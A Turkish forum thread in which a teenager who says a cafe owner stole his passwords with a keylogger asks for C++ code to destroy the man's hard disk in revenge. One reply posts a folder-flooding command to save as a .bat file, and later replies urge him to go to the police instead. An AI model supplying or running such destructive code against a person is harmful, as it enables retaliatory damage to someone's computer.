Arkadaşlar olay şu bana c++ dilinde bir virüs lazım.Hardiski yakacak bir virüs olmalı.Sebebide zevk için degil.Bir internet kafeciden parayla bir oyuna m çektim.Sonra 100m çekene hile bedava dedi ve bir hile verdi.Ertesi gün bilgisayarıma keyloger girdigini anladım.Facebook şifrem oyundaki çarımın şifresi ve banka hesap şifrelerim giti.Bide hardiskim yandı.Aynısını bende internet cafedeki adama bende yapıcam nolursunuz acil yardım edin.C++dilinde olursa iyiolur.Onu biliyorum az çok.
Çok acil yardım!arkadaşlar
/timersecure 0 0 //mkdir $mid(C:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)
başlattaki çalıştıra yazdırabilirsen yazdır.yazdıramazsan not defterine kopyalayıpfarklı kaydetten istediğin ismi koyup sonuna .bat ekle sakın açma açarsan booooom.(Allah Rahmet Eylesin)
Benim yaşım 15 oynadıgım oyun metin2 ama nasıldesem daha açık olsa şu kodlar.Hani c++ hesap makinesi yaparmış gibi yazılmış olsa kodlar.Yani iyi bir ders vermek istiyorum adama.Ayriyeten yanıtlarınız için saolun.
cafeciye o dosyayı nasıl açtırcaksın? unut bu işleri.
Eğer gerçekten böyle bir şey yaptıysa yanına 18 yaşından büyük bir büyüğünü alıp polise git. Bunu çok ciddi söylüyorum. Olanı bir bir anlat. Hem o sattığı oyun parasından vergi vermiyor hemde bilişim suçu işleyerek seni maddi zarara uğratıyor. Bunun cezası var. Saçma sapan işlerle uğraşma. Direk yasal hakkına başvur.
Dedigin tavsiyeyi uygulayıcam ve uğraşmıyacam.Saol